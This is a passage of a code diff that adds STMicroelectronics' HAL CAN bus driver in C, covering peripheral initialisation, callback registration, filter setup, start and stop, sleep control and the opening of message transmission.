hcan->MspInitCallback(hcan); + } + +#else + if (hcan->State == HAL_CAN_STATE_RESET) + { + /* Init the low level hardware: CLOCK, NVIC */ + HAL_CAN_MspInit(hcan); + } +#endif /* (USE_HAL_CAN_REGISTER_CALLBACKS) */ + + /* Request initialisation */ + SET_BIT(hcan->Instance->MCR, CAN_MCR_INRQ); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait initialisation acknowledge */ + while ((hcan->Instance->MSR & CAN_MSR_INAK) == 0U) + { + if ((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_TIMEOUT; + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + return HAL_ERROR; + } + } + + /* Exit from sleep mode */ + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_SLEEP); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check Sleep mode leave acknowledge */ + while ((hcan->Instance->MSR & CAN_MSR_SLAK) != 0U) + { + if ((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_TIMEOUT; + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + return HAL_ERROR; + } + } + + /* Set the time triggered communication mode */ + if (hcan->Init.TimeTriggeredMode == ENABLE) + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_TTCM); + } + else + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_TTCM); + } + + /* Set the automatic bus-off management */ + if (hcan->Init.AutoBusOff == ENABLE) + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_ABOM); + } + else + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_ABOM); + } + + /* Set the automatic wake-up mode */ + if (hcan->Init.AutoWakeUp == ENABLE) + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_AWUM); + } + else + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_AWUM); + } + + /* Set the automatic retransmission */ + if (hcan->Init.AutoRetransmission == ENABLE) + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_NART); + } + else + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_NART); + } + + /* Set the receive FIFO locked mode */ + if (hcan->Init.ReceiveFifoLocked == ENABLE) + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_RFLM); + } + else + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_RFLM); + } + + /* Set the transmit FIFO priority */ + if (hcan->Init.TransmitFifoPriority == ENABLE) + { + SET_BIT(hcan->Instance->MCR, CAN_MCR_TXFP); + } + else + { + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_TXFP); + } + + /* Set the bit timing register */ + WRITE_REG(hcan->Instance->BTR, (uint32_t)(hcan->Init.Mode | + hcan->Init.SyncJumpWidth | + hcan->Init.TimeSeg1 | + hcan->Init.TimeSeg2 | + (hcan->Init.Prescaler - 1U))); + + /* Initialize the error code */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Initialize the CAN state */ + hcan->State = HAL_CAN_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Deinitializes the CAN peripheral registers to their default + * reset values. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_DeInit(CAN_HandleTypeDef *hcan) +{ + /* Check CAN handle */ + if (hcan == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CAN_ALL_INSTANCE(hcan->Instance)); + + /* Stop the CAN module */ + (void)HAL_CAN_Stop(hcan); + +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + if (hcan->MspDeInitCallback == NULL) + { + hcan->MspDeInitCallback = HAL_CAN_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: CLOCK, NVIC */ + hcan->MspDeInitCallback(hcan); + +#else + /* DeInit the low level hardware: CLOCK, NVIC */ + HAL_CAN_MspDeInit(hcan); +#endif /* (USE_HAL_CAN_REGISTER_CALLBACKS) */ + + /* Reset the CAN peripheral */ + SET_BIT(hcan->Instance->MCR, CAN_MCR_RESET); + + /* Reset the CAN ErrorCode */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_RESET; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the CAN MSP. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_MspInit(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the CAN MSP. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_MspDeInit(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_MspDeInit could be implemented in the user file + */ +} + +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 +/** + * @brief Register a CAN CallBack. + * To be used instead of the weak predefined callback + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for CAN module + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_CAN_TX_MAILBOX0_COMPLETE_CB_ID Tx Mailbox 0 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX1_COMPLETE_CB_ID Tx Mailbox 1 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX2_COMPLETE_CB_ID Tx Mailbox 2 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX0_ABORT_CB_ID Tx Mailbox 0 Abort callback ID + * @arg @ref HAL_CAN_TX_MAILBOX1_ABORT_CB_ID Tx Mailbox 1 Abort callback ID + * @arg @ref HAL_CAN_TX_MAILBOX2_ABORT_CB_ID Tx Mailbox 2 Abort callback ID + * @arg @ref HAL_CAN_RX_FIFO0_MSG_PENDING_CB_ID Rx Fifo 0 message pending callback ID + * @arg @ref HAL_CAN_RX_FIFO0_FULL_CB_ID Rx Fifo 0 full callback ID + * @arg @ref HAL_CAN_RX_FIFO1_MSG_PENDING_CB_ID Rx Fifo 1 message pending callback ID + * @arg @ref HAL_CAN_RX_FIFO1_FULL_CB_ID Rx Fifo 1 full callback ID + * @arg @ref HAL_CAN_SLEEP_CB_ID Sleep callback ID + * @arg @ref HAL_CAN_WAKEUP_FROM_RX_MSG_CB_ID Wake Up from Rx message callback ID + * @arg @ref HAL_CAN_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CAN_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CAN_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_RegisterCallback(CAN_HandleTypeDef *hcan, HAL_CAN_CallbackIDTypeDef CallbackID, void (* pCallback)(CAN_HandleTypeDef *_hcan)) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + if (hcan->State == HAL_CAN_STATE_READY) + { + switch (CallbackID) + { + case HAL_CAN_TX_MAILBOX0_COMPLETE_CB_ID : + hcan->TxMailbox0CompleteCallback = pCallback; + break; + + case HAL_CAN_TX_MAILBOX1_COMPLETE_CB_ID : + hcan->TxMailbox1CompleteCallback = pCallback; + break; + + case HAL_CAN_TX_MAILBOX2_COMPLETE_CB_ID : + hcan->TxMailbox2CompleteCallback = pCallback; + break; + + case HAL_CAN_TX_MAILBOX0_ABORT_CB_ID : + hcan->TxMailbox0AbortCallback = pCallback; + break; + + case HAL_CAN_TX_MAILBOX1_ABORT_CB_ID : + hcan->TxMailbox1AbortCallback = pCallback; + break; + + case HAL_CAN_TX_MAILBOX2_ABORT_CB_ID : + hcan->TxMailbox2AbortCallback = pCallback; + break; + + case HAL_CAN_RX_FIFO0_MSG_PENDING_CB_ID : + hcan->RxFifo0MsgPendingCallback = pCallback; + break; + + case HAL_CAN_RX_FIFO0_FULL_CB_ID : + hcan->RxFifo0FullCallback = pCallback; + break; + + case HAL_CAN_RX_FIFO1_MSG_PENDING_CB_ID : + hcan->RxFifo1MsgPendingCallback = pCallback; + break; + + case HAL_CAN_RX_FIFO1_FULL_CB_ID : + hcan->RxFifo1FullCallback = pCallback; + break; + + case HAL_CAN_SLEEP_CB_ID : + hcan->SleepCallback = pCallback; + break; + + case HAL_CAN_WAKEUP_FROM_RX_MSG_CB_ID : + hcan->WakeUpFromRxMsgCallback = pCallback; + break; + + case HAL_CAN_ERROR_CB_ID : + hcan->ErrorCallback = pCallback; + break; + + case HAL_CAN_MSPINIT_CB_ID : + hcan->MspInitCallback = pCallback; + break; + + case HAL_CAN_MSPDEINIT_CB_ID : + hcan->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcan->State == HAL_CAN_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CAN_MSPINIT_CB_ID : + hcan->MspInitCallback = pCallback; + break; + + case HAL_CAN_MSPDEINIT_CB_ID : + hcan->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + return status; +} + +/** + * @brief Unregister a CAN CallBack. + * CAN callabck is redirected to the weak predefined callback + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for CAN module + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_CAN_TX_MAILBOX0_COMPLETE_CB_ID Tx Mailbox 0 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX1_COMPLETE_CB_ID Tx Mailbox 1 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX2_COMPLETE_CB_ID Tx Mailbox 2 Complete callback ID + * @arg @ref HAL_CAN_TX_MAILBOX0_ABORT_CB_ID Tx Mailbox 0 Abort callback ID + * @arg @ref HAL_CAN_TX_MAILBOX1_ABORT_CB_ID Tx Mailbox 1 Abort callback ID + * @arg @ref HAL_CAN_TX_MAILBOX2_ABORT_CB_ID Tx Mailbox 2 Abort callback ID + * @arg @ref HAL_CAN_RX_FIFO0_MSG_PENDING_CB_ID Rx Fifo 0 message pending callback ID + * @arg @ref HAL_CAN_RX_FIFO0_FULL_CB_ID Rx Fifo 0 full callback ID + * @arg @ref HAL_CAN_RX_FIFO1_MSG_PENDING_CB_ID Rx Fifo 1 message pending callback ID + * @arg @ref HAL_CAN_RX_FIFO1_FULL_CB_ID Rx Fifo 1 full callback ID + * @arg @ref HAL_CAN_SLEEP_CB_ID Sleep callback ID + * @arg @ref HAL_CAN_WAKEUP_FROM_RX_MSG_CB_ID Wake Up from Rx message callback ID + * @arg @ref HAL_CAN_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CAN_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CAN_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_UnRegisterCallback(CAN_HandleTypeDef *hcan, HAL_CAN_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (hcan->State == HAL_CAN_STATE_READY) + { + switch (CallbackID) + { + case HAL_CAN_TX_MAILBOX0_COMPLETE_CB_ID : + hcan->TxMailbox0CompleteCallback = HAL_CAN_TxMailbox0CompleteCallback; + break; + + case HAL_CAN_TX_MAILBOX1_COMPLETE_CB_ID : + hcan->TxMailbox1CompleteCallback = HAL_CAN_TxMailbox1CompleteCallback; + break; + + case HAL_CAN_TX_MAILBOX2_COMPLETE_CB_ID : + hcan->TxMailbox2CompleteCallback = HAL_CAN_TxMailbox2CompleteCallback; + break; + + case HAL_CAN_TX_MAILBOX0_ABORT_CB_ID : + hcan->TxMailbox0AbortCallback = HAL_CAN_TxMailbox0AbortCallback; + break; + + case HAL_CAN_TX_MAILBOX1_ABORT_CB_ID : + hcan->TxMailbox1AbortCallback = HAL_CAN_TxMailbox1AbortCallback; + break; + + case HAL_CAN_TX_MAILBOX2_ABORT_CB_ID : + hcan->TxMailbox2AbortCallback = HAL_CAN_TxMailbox2AbortCallback; + break; + + case HAL_CAN_RX_FIFO0_MSG_PENDING_CB_ID : + hcan->RxFifo0MsgPendingCallback = HAL_CAN_RxFifo0MsgPendingCallback; + break; + + case HAL_CAN_RX_FIFO0_FULL_CB_ID : + hcan->RxFifo0FullCallback = HAL_CAN_RxFifo0FullCallback; + break; + + case HAL_CAN_RX_FIFO1_MSG_PENDING_CB_ID : + hcan->RxFifo1MsgPendingCallback = HAL_CAN_RxFifo1MsgPendingCallback; + break; + + case HAL_CAN_RX_FIFO1_FULL_CB_ID : + hcan->RxFifo1FullCallback = HAL_CAN_RxFifo1FullCallback; + break; + + case HAL_CAN_SLEEP_CB_ID : + hcan->SleepCallback = HAL_CAN_SleepCallback; + break; + + case HAL_CAN_WAKEUP_FROM_RX_MSG_CB_ID : + hcan->WakeUpFromRxMsgCallback = HAL_CAN_WakeUpFromRxMsgCallback; + break; + + case HAL_CAN_ERROR_CB_ID : + hcan->ErrorCallback = HAL_CAN_ErrorCallback; + break; + + case HAL_CAN_MSPINIT_CB_ID : + hcan->MspInitCallback = HAL_CAN_MspInit; + break; + + case HAL_CAN_MSPDEINIT_CB_ID : + hcan->MspDeInitCallback = HAL_CAN_MspDeInit; + break; + + default : + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcan->State == HAL_CAN_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CAN_MSPINIT_CB_ID : + hcan->MspInitCallback = HAL_CAN_MspInit; + break; + + case HAL_CAN_MSPDEINIT_CB_ID : + hcan->MspDeInitCallback = HAL_CAN_MspDeInit; + break; + + default : + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + return status; +} +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group2 Configuration functions + * @brief Configuration functions. + * +@verbatim + ============================================================================== + ##### Configuration functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) HAL_CAN_ConfigFilter : Configure the CAN reception filters + +@endverbatim + * @{ + */ + +/** + * @brief Configures the CAN reception filter according to the specified + * parameters in the CAN_FilterInitStruct. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param sFilterConfig pointer to a CAN_FilterTypeDef structure that + * contains the filter configuration information. + * @retval None + */ +HAL_StatusTypeDef HAL_CAN_ConfigFilter(CAN_HandleTypeDef *hcan, CAN_FilterTypeDef *sFilterConfig) +{ + uint32_t filternbrbitpos; + CAN_TypeDef *can_ip = hcan->Instance; + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check the parameters */ + assert_param(IS_CAN_FILTER_ID_HALFWORD(sFilterConfig->FilterIdHigh)); + assert_param(IS_CAN_FILTER_ID_HALFWORD(sFilterConfig->FilterIdLow)); + assert_param(IS_CAN_FILTER_ID_HALFWORD(sFilterConfig->FilterMaskIdHigh)); + assert_param(IS_CAN_FILTER_ID_HALFWORD(sFilterConfig->FilterMaskIdLow)); + assert_param(IS_CAN_FILTER_MODE(sFilterConfig->FilterMode)); + assert_param(IS_CAN_FILTER_SCALE(sFilterConfig->FilterScale)); + assert_param(IS_CAN_FILTER_FIFO(sFilterConfig->FilterFIFOAssignment)); + assert_param(IS_CAN_FILTER_ACTIVATION(sFilterConfig->FilterActivation)); + +#if defined(CAN3) + /* Check the CAN instance */ + if (hcan->Instance == CAN3) + { + /* CAN3 is single instance with 14 dedicated filters banks */ + + /* Check the parameters */ + assert_param(IS_CAN_FILTER_BANK_SINGLE(sFilterConfig->FilterBank)); + } + else + { + /* CAN1 and CAN2 are dual instances with 28 common filters banks */ + /* Select master instance to access the filter banks */ + can_ip = CAN1; + + /* Check the parameters */ + assert_param(IS_CAN_FILTER_BANK_DUAL(sFilterConfig->FilterBank)); + assert_param(IS_CAN_FILTER_BANK_DUAL(sFilterConfig->SlaveStartFilterBank)); + } +#elif defined(CAN2) + /* CAN1 and CAN2 are dual instances with 28 common filters banks */ + /* Select master instance to access the filter banks */ + can_ip = CAN1; + + /* Check the parameters */ + assert_param(IS_CAN_FILTER_BANK_DUAL(sFilterConfig->FilterBank)); + assert_param(IS_CAN_FILTER_BANK_DUAL(sFilterConfig->SlaveStartFilterBank)); +#else + /* CAN1 is single instance with 14 dedicated filters banks */ + + /* Check the parameters */ + assert_param(IS_CAN_FILTER_BANK_SINGLE(sFilterConfig->FilterBank)); +#endif + + /* Initialisation mode for the filter */ + SET_BIT(can_ip->FMR, CAN_FMR_FINIT); + +#if defined(CAN3) + /* Check the CAN instance */ + if (can_ip == CAN1) + { + /* Select the start filter number of CAN2 slave instance */ + CLEAR_BIT(can_ip->FMR, CAN_FMR_CAN2SB); + SET_BIT(can_ip->FMR, sFilterConfig->SlaveStartFilterBank << CAN_FMR_CAN2SB_Pos); + } + +#elif defined(CAN2) + /* Select the start filter number of CAN2 slave instance */ + CLEAR_BIT(can_ip->FMR, CAN_FMR_CAN2SB); + SET_BIT(can_ip->FMR, sFilterConfig->SlaveStartFilterBank << CAN_FMR_CAN2SB_Pos); + +#endif + /* Convert filter number into bit position */ + filternbrbitpos = (uint32_t)1 << (sFilterConfig->FilterBank & 0x1FU); + + /* Filter Deactivation */ + CLEAR_BIT(can_ip->FA1R, filternbrbitpos); + + /* Filter Scale */ + if (sFilterConfig->FilterScale == CAN_FILTERSCALE_16BIT) + { + /* 16-bit scale for the filter */ + CLEAR_BIT(can_ip->FS1R, filternbrbitpos); + + /* First 16-bit identifier and First 16-bit mask */ + /* Or First 16-bit identifier and Second 16-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterBank].FR1 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdLow) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdLow); + + /* Second 16-bit identifier and Second 16-bit mask */ + /* Or Third 16-bit identifier and Fourth 16-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterBank].FR2 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdHigh); + } + + if (sFilterConfig->FilterScale == CAN_FILTERSCALE_32BIT) + { + /* 32-bit scale for the filter */ + SET_BIT(can_ip->FS1R, filternbrbitpos); + + /* 32-bit identifier or First 32-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterBank].FR1 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdLow); + + /* 32-bit mask or Second 32-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterBank].FR2 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdLow); + } + + /* Filter Mode */ + if (sFilterConfig->FilterMode == CAN_FILTERMODE_IDMASK) + { + /* Id/Mask mode for the filter*/ + CLEAR_BIT(can_ip->FM1R, filternbrbitpos); + } + else /* CAN_FilterInitStruct->CAN_FilterMode == CAN_FilterMode_IdList */ + { + /* Identifier list mode for the filter*/ + SET_BIT(can_ip->FM1R, filternbrbitpos); + } + + /* Filter FIFO assignment */ + if (sFilterConfig->FilterFIFOAssignment == CAN_FILTER_FIFO0) + { + /* FIFO 0 assignation for the filter */ + CLEAR_BIT(can_ip->FFA1R, filternbrbitpos); + } + else + { + /* FIFO 1 assignation for the filter */ + SET_BIT(can_ip->FFA1R, filternbrbitpos); + } + + /* Filter activation */ + if (sFilterConfig->FilterActivation == CAN_FILTER_ENABLE) + { + SET_BIT(can_ip->FA1R, filternbrbitpos); + } + + /* Leave the initialisation mode for the filter */ + CLEAR_BIT(can_ip->FMR, CAN_FMR_FINIT); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group3 Control functions + * @brief Control functions + * +@verbatim + ============================================================================== + ##### Control functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) HAL_CAN_Start : Start the CAN module + (+) HAL_CAN_Stop : Stop the CAN module + (+) HAL_CAN_RequestSleep : Request sleep mode entry. + (+) HAL_CAN_WakeUp : Wake up from sleep mode. + (+) HAL_CAN_IsSleepActive : Check is sleep mode is active. + (+) HAL_CAN_AddTxMessage : Add a message to the Tx mailboxes + and activate the corresponding + transmission request + (+) HAL_CAN_AbortTxRequest : Abort transmission request + (+) HAL_CAN_GetTxMailboxesFreeLevel : Return Tx mailboxes free level + (+) HAL_CAN_IsTxMessagePending : Check if a transmission request is + pending on the selected Tx mailbox + (+) HAL_CAN_GetRxMessage : Get a CAN frame from the Rx FIFO + (+) HAL_CAN_GetRxFifoFillLevel : Return Rx FIFO fill level + +@endverbatim + * @{ + */ + +/** + * @brief Start the CAN module. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Start(CAN_HandleTypeDef *hcan) +{ + uint32_t tickstart; + + if (hcan->State == HAL_CAN_STATE_READY) + { + /* Change CAN peripheral state */ + hcan->State = HAL_CAN_STATE_LISTENING; + + /* Request leave initialisation */ + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_INRQ); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the acknowledge */ + while ((hcan->Instance->MSR & CAN_MSR_INAK) != 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_TIMEOUT; + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + return HAL_ERROR; + } + } + + /* Reset the CAN ErrorCode */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_READY; + + return HAL_ERROR; + } +} + +/** + * @brief Stop the CAN module and enable access to configuration registers. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Stop(CAN_HandleTypeDef *hcan) +{ + uint32_t tickstart; + + if (hcan->State == HAL_CAN_STATE_LISTENING) + { + /* Request initialisation */ + SET_BIT(hcan->Instance->MCR, CAN_MCR_INRQ); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the acknowledge */ + while ((hcan->Instance->MSR & CAN_MSR_INAK) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_TIMEOUT; + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + return HAL_ERROR; + } + } + + /* Exit from sleep mode */ + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_SLEEP); + + /* Change CAN peripheral state */ + hcan->State = HAL_CAN_STATE_READY; + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_STARTED; + + return HAL_ERROR; + } +} + +/** + * @brief Request the sleep mode (low power) entry. + * When returning from this function, Sleep mode will be entered + * as soon as the current CAN activity (transmission or reception + * of a CAN frame) has been completed. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_CAN_RequestSleep(CAN_HandleTypeDef *hcan) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Request Sleep mode */ + SET_BIT(hcan->Instance->MCR, CAN_MCR_SLEEP); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + /* Return function status */ + return HAL_ERROR; + } +} + +/** + * @brief Wake up from sleep mode. + * When returning with HAL_OK status from this function, Sleep mode + * is exited. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_CAN_WakeUp(CAN_HandleTypeDef *hcan) +{ + __IO uint32_t count = 0; + uint32_t timeout = 1000000U; + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Wake up request */ + CLEAR_BIT(hcan->Instance->MCR, CAN_MCR_SLEEP); + + /* Wait sleep mode is exited */ + do + { + /* Increment counter */ + count++; + + /* Check if timeout is reached */ + if (count > timeout) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_TIMEOUT; + + return HAL_ERROR; + } + } + while ((hcan->Instance->MSR & CAN_MSR_SLAK) != 0U); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Check is sleep mode is active. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval Status + * - 0 : Sleep mode is not active. + * - 1 : Sleep mode is active. + */ +uint32_t HAL_CAN_IsSleepActive(CAN_HandleTypeDef *hcan) +{ + uint32_t status = 0U; + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check Sleep mode */ + if ((hcan->Instance->MSR & CAN_MSR_SLAK) != 0U) + { + status = 1U; + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Add a message to the first free Tx mailbox and activate the + * corresponding transmission request. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param pHeader pointer to a CAN_TxHeaderTypeDef structure. + * @param aData array containing the payload of the Tx frame. + * @param pTxMailbox pointer to a variable where the function will return + * the TxMailbox used to store the Tx message. + * This parameter can be a value of @arg CAN_Tx_Mailboxes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_AddTxMessage(CAN_HandleTypeDef *hcan, CAN_TxHeaderTypeDef *pHeader, uint8_t aData[], uint32_t *pTxMailbox) +{ + uint32_t transmitmailbox; + HAL_CAN_StateTypeDef state = hcan->State; + uint32_t tsr = READ_REG(hcan->Instance->TSR); + + /* Check the parameters */ + assert_param(IS_CAN_IDTYPE(pHeader->IDE)); + assert_param(IS_CAN_RTR(pHeader->RTR)); + assert_param(IS_CAN_DLC(pHeader->DLC)); + if (pHeader->IDE == CAN_ID_STD) + { + assert_param(IS_CAN_STDID(pHeader->StdId)); + } + else + { + assert_param(IS_CAN_EXTID(pHeader->ExtId)); + } + assert_param(IS_FUNCTIONAL_STATE(pHeader->TransmitGlobalTime)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check that all the Tx mailboxes are not full */ + if (((tsr & CAN_TSR_TME0) != 0U) || + ((tsr & CAN_TSR_TME1) != 0U) || + ((tsr & CAN_TSR_TME2) != 0U)) + { + /* Select an empty transmit mailbox */ + transmitmailbox = (tsr & CAN_TSR_CODE) >> CAN_TSR_CODE_Pos; + + /* Check transmit mailbox value */ + if (transmitmailbox > 2U) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_INTERNAL; + + return HAL_ERROR; + } + + /* Store the Tx mailbox */ + *pTxMailbox = (uint32_t)1 << transmitmailbox; + + /* Set up the Id */ + if (pHeader->IDE == CAN_ID_STD) + { + hcan->Instance->sTxMailBox[transmitmailbox].TIR = ((pHeader->StdId << CAN_TI0R_STID_Pos) | + pHeader->RTR); + } + else + { + hcan->Instance->sTxMailBox[transmitmailbox].TIR = ((pHeader->ExtId << CAN_TI0R_EXID_Pos) | + pHeader->IDE | + pHeader->RTR); + } + + /* Set up the DLC */ + hcan->Instance->sTxMailBox[transmitmailbox].TDTR = (pHeader->DLC); + + /* Set up the Transmit Global Time mode */ + if (pHeader->TransmitGlobalTime == ENABLE) + { + SET_BIT(hcan->Instance->sTxMailBox[transmitmailbox].TDTR, CAN_TDT0R_TGT); + } + + /* Set up the data field */ + 